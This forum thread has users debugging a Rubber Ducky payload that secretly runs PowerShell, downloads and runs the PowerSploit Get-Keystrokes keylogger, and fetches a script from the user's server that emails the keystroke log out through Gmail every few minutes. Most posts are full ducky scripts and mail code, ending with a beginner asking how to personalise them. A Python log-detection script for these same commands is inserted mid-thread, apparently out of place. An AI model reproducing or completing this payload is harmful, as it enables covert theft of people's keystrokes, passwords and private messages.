
Powershell keylogger in seconds


GunZofPeace


Just guessing but the issue might be on this line.  I don't use smtpclient in Powershell but instead use send-mailmessage.

But... the issue with the smtpclient in the script may be this, and the correction that may need to happen.

while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

should be maybe???

while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

The attachment of the mailmessage object takes an attachment object.

Edited by PoSHMagiC0de
forgot extra parenthesis.

On 4/27/2018 at 4:16 AM, PoSHMagiC0de said:

Just guessing but the issue might be on this line.  I don't use smtpclient in Powershell but instead use send-mailmessage.

But... the issue with the smtpclient in the script may be this, and the correction that may need to happen.


while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

should be maybe???

while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

The attachment of the mailmessage object takes an attachment object.

Hey, thanks for the reply. I tried to modify the mail.ps1 with


while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

I'm still getting the same issue... empty emails. I can't solve this problem.


Last thing I would try is to see if the original keylogger script is actually working and creating a log file at that location, wherever $env:temp points to. If you type that out in PowerShell it will tell you. Look for the key.txt while just running the keylogger. If a file shows up and holds data then something is up with the emailer. If you get no key.txt or no stuff in it then the keylogger is not logging.


31 minutes ago, PoSHMagiC0de said:

Last thing I would try is to see if the original keylogger script is actually working and creating a log file at that location, wherever $env:temp points to. If you type that out in PowerShell it will tell you. Look for the key.txt while just running the keylogger. If a file shows up and holds data then something is up with the emailer. If you get no key.txt or no stuff in it then the keylogger is not logging.

Nope, I had a look in %temp% and there is no log.txt created.

Tried both scripts, same issue. Getting empty mails.


https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1

https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1


Sorry, just the Get-Keystrokes.ps1 script.  Download it locally if you have to.

 

By default, if run on its own with no parameters, it should create a key.log in the temp folder. The line below in the payload.txt changes that to key.txt if run with it.

STRING Get-Keystrokes -LogPath $env:temp\key.txt

So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log.  The test should look like below:

Run PowerShell and then run each line.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

#For Default path.
Get-Keystrokes

#To place it on your desktop do and look for keylog.txt to popup.
Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)

It runs in a runspace so PS will return once it starts running.  You can add the param -PassThru to get a copy of the runspace to look at too.  With that you can stop it or closing the Powershell window will do the same I believe.  I have to test.

I do not have my test machine up to test so going off of what I read inside all the scripts.

Might want to check your AV too. The keylogger comes from PowerSploit, which is known by the AV authors, so it might be getting blocked.

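The AV remark above has a defensive counterpart: each stage of this payload leaves recognisable text in Windows process-creation and PowerShell script block logs. As an added example (not part of the original post and not PowerSploit code), this Python script matches the command lines quoted in this thread against constructed log records; the rule names, host names and sample events are assumptions made up for illustration.

```python
import re
from collections import defaultdict

# Patterns taken from the command lines quoted in this thread (case-insensitive,
# because PowerShell is). The rule names are this example's own.
RULES = {
    "hidden_window": re.compile(r"-windowstyle\s+hidden", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression)\b.*\bdownloadstring\s*\(", re.I | re.S),
    "keylogger_function": re.compile(r"\bget-keystrokes\b", re.I),
    "smtp_attachment": re.compile(
        r"net\.mail\.smtpclient.*attachments\.add\s*\(", re.I | re.S),
}

# Constructed sample records: (host, event id, logged text).
# 4688 = process creation command line, 4104 = PowerShell script block logging.
SAMPLE_EVENTS = [
    ("WS01", 4688, r"powershell -WindowStyle hidden"),
    ("WS01", 4104, r"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')"),
    ("WS01", 4104, r"Get-Keystrokes -LogPath $env:temp\key.txt"),
    ("WS01", 4104, r"$SMTPInfo = New-Object Net.Mail.SmtpClient('smtp.gmail.com', 587); "
                   r"$ReportEmail.Attachments.Add('key.txt'); $SMTPInfo.Send($ReportEmail)"),
    ("WS02", 4104, r"Send-MailMessage -To ops@example.test -Subject 'backup ok'"),
    ("WS03", 4104, r"invoke-expression (new-object net.webclient).downloadstring('http://intranet.example.test/setup.ps1')"),
]

def triage(events):
    """Group rule hits per host and grade the combination seen on each host."""
    hits = defaultdict(set)
    for host, _event_id, text in events:
        for name, pattern in RULES.items():
            if pattern.search(text):
                hits[host].add(name)
    report = {}
    for host, names in hits.items():
        if {"keylogger_function", "smtp_attachment"} <= names:
            verdict = "keylogger+exfil"   # capture and mail-out seen on one host
        elif "keylogger_function" in names:
            verdict = "keylogger"
        else:
            verdict = "suspicious"        # cradle, hidden window or SMTP alone
        report[host] = {"hits": sorted(names), "verdict": verdict}
    return report

if __name__ == "__main__":
    for host, result in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, result["verdict"], ", ".join(result["hits"]))
```

Hosts with no rule hit (WS02 here) are left out of the report, and a download cradle on its own is graded lower than the keylogger function name appearing together with an SMTP attachment send.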

19 minutes ago, PoSHMagiC0de said:

Sorry, just the Get-Keystrokes.ps1 script.  Download it locally if you have to.

 

By default, if run on its own with no parameters, it should create a key.log in the temp folder. The line below in the payload.txt changes that to key.txt if run with it.


STRING Get-Keystrokes -LogPath $env:temp\key.txt

So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log.  The test should look like below:

Run PowerShell and then run each line.


IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

#For Default path.
Get-Keystrokes

#To place it on your desktop do and look for keylog.txt to popup.
Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)

It runs in a runspace so PS will return once it starts running.  You can add the param -PassThru to get a copy of the runspace to look at too.  With that you can stop it or closing the Powershell window will do the same I believe.  I have to test.

I do not have my test machine up to test so going off of what I read inside all the scripts.

Might want to check your AV too. The keylogger comes from PowerSploit, which is known by the AV authors, so it might be getting blocked.


Thanks, so if I got it right the script should look like this. I'm going to try in a sec.

 

So if I followed you right the script should look like this:

DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle hidden
ENTER
DELAY 1500
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 400
STRING Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)
ENTER
DELAY 200
GUI r
DELAY 300
STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://xxxx.pe.hu/keylogger/mail.ps1')
ENTER

 

$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxx@gmail.com', 'password')
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'xxxx@gmail.com'
$ReportEmail.To.Add('xxxx@gmail.com')
$ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$env:userprofile\Desktop\keylog.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

Edited by mrskannk

Nope, what I am doing here is helping you troubleshoot the payload so first take the Rubber Ducky or Bash Bunny and put it in the drawer.  Ignore it for now.  What you are going to have to do is verify the payload works without the RD or BB.  If it doesn't work without it on your test machine then it definitely will not work being launched from the device.

So, above I was trying to have you just jump on your test machine.  Run powershell and just use the two line commands I put out.

The first will download and launch the get-keystrokes function to memory for use. The second and third were to run get-keystrokes as default, which should write the key.log file to your temp folder on your machine, or use the second get-keystrokes command with a path to have it write to your desktop so you know where it should be. I would do the second one, so if it works you should get a key.txt right on your desktop that should start populating with keystrokes. If you get nothing, something is wrong, but at least you may get an error message if it does. If get-keystrokes doesn't run (which is the actual keylogger) then you will get nothing in email. So, ignore the RD for now until you know the scripts work.

 

Now if it does then try and run the payload by hand.  That means playing out by hand what the payload does to see if everything works.  


  • 1 month later...
  • 3 years later...
  • 2 months later...
On 3/8/2017 at 6:57 AM, Speed09 said:

I'm not good at powershell at all, but I managed to get the exfiltrate working.

I simply modified the payload to run a ps script from my server that will send me the log file via email.

Here is the final ducky script:

 DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle hidden
ENTER
DELAY 1500
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 400
STRING Get-Keystrokes -LogPath $env:temp\key.txt
ENTER
DELAY 200
GUI r
DELAY 300
STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://yourserver/mail.ps1')
ENTER

 

And here is the mail.ps1 content:

$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youradress@gmail.com', 'yourpass')
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'youradress@gmail.com'
$ReportEmail.To.Add('youradress@gmail.com')
$ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360} 

Hi, I'm a beginner and I use a micro pro Arduino board as a rubber ducky.

What should I change in this script as personal information??

Please, I need help.

 

 
